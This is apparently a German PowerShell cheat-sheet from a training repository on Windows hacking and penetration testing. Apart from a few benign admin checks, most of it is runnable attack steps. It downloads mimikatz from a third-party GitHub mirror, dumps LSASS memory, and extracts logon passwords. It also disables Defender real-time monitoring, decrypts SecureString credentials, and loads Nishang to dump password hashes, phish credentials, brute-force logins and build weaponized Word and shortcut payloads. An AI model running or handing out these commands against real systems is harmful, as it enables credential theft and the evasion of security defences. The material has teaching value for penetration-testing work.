AKPT

5.18.0.1

Wissen/X11_Technology_HackingSecurity.ps1

                                # ?    TITEL Hacking / Penetration-Testing

# ? DESCRIPTION mittels PowerShell Windows auf Schwachstellen prüfen

# ?      TAGS ACL SecureString Password Penetration

# ?  VERSION 2019.11.08

# ? Bestehende Execution Policy überschreiben

Get-Content -Path .\_SCHNIPPSEL.ps1 | powershell.exe -NoProfile -

# ? NTFS Berechtigungen auflisten

Get-Acl -Path $env:windir | Select-Object -ExpandProperty Access

# ? Zufallspasswort generieren

$erlaubteZeichen = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890!§$%&*~.,-"

-join ($erlaubteZeichen.ToCharArray() | Get-Random -Count 10)

# ? SecureString entschlüsseln

$cred = Get-Credential -Message "HR Leader" -UserName "mueller"

$cred.UserName

[System.Runtime.InteropServices.marshal]::PtrToStringAuto([System.Runtime.InteropServices.marshal]::SecureStringToBSTR($cred.Password))

# ? Besitzt der Benutzer Admin-Rechte

$identity = [Security.Principal.WindowsIdentity]::GetCurrent()

$principal = New-Object -TypeName Security.Principal.WindowsPrincipal -ArgumentList $identity

$principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)

#region Windows-Passwörter auslesen (MimiKatz)

Set-Location C:\temp

[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]'Tls11,Tls12'

Invoke-WebRequest -Uri 'https://github.com/entynetproject/WebBrowserPassView-plugin/raw/master/mimikatz_trunk/x64/mimikatz.exe' -OutFile ".\mimikatz.exe"

Invoke-WebRequest -Uri 'https://github.com/entynetproject/WebBrowserPassView-plugin/raw/master/mimikatz_trunk/x64/mimilib.dll'  -OutFile ".\mimilib.dll"

Invoke-WebRequest -Uri 'https://github.com/entynetproject/WebBrowserPassView-plugin/raw/master/mimikatz_trunk/x64/mimidrv.sys'  -OutFile ".\mimidrv.sys"

Get-Process lsass | Out-Minidump

Start-Process -FilePath .\mimikatz.exe

# in mimikatz

#       sekurlsa::minidump C:\temp\lsass_776.dmp

#       sekurlsa::logonPasswords full

#endregion

#region Penetration-Testing-Framework (Nishang)

Start-Process https://n0where.net/powershell-penetration-testing-framework-nishang

Start-Process https://serenity-networks.com/hacking-in-windows-using-nishang-with-windows-powershell

Set-Location C:\temp

Invoke-WebRequest -Uri "https://github.com/samratashok/nishang/archive/master.zip" -OutFile ".\nishang.zip"

Expand-Archive -Path ".\nishang.zip" -DestinationPath "." -Force

Rename-Item -Path .\nishang-master -NewName nishang -Force

Get-ChildItem -Path '.\nishang' -Recurse | Unblock-File

Set-MpPreference -DisableRealtimeMonitoring $true

Import-Module -Name .\nishang 

Get-Command -Module nishang | Out-GridView

Get-Information

Get-PassHashes

Get-WebCredentials

Out-Word -Payload 'powershell.exe -ExecutionPolicy Bypass -noprofile'

Out-Shortcut -Payload 'powershell.exe -ExecutionPolicy Bypass -noprofile'

Get-ExecutionPolicy -List

ConvertTo-ROT13 -rot13string "hallo köln" 

Show-TargetScreen 127.0.0.1

Speak -Sentence "Ich weiß was du letzten Sommer getan hast"

Invoke-PortScan 192.168.103.156 192.168.103.156 -ScanPort

Get-help Get-Wlan-Keys -full

Invoke-CredentialsPhish

Invoke-MimikatzWDigestDowngrade 

Invoke-BruteForce 127.0.0.

Remove-Module -Name nishang 

Remove-Item -Path .\nishang -Force -Recurse

Remove-Item -Path .\nishang.zip -Force

Set-MpPreference -DisableRealtimeMonitoring $false

#endregion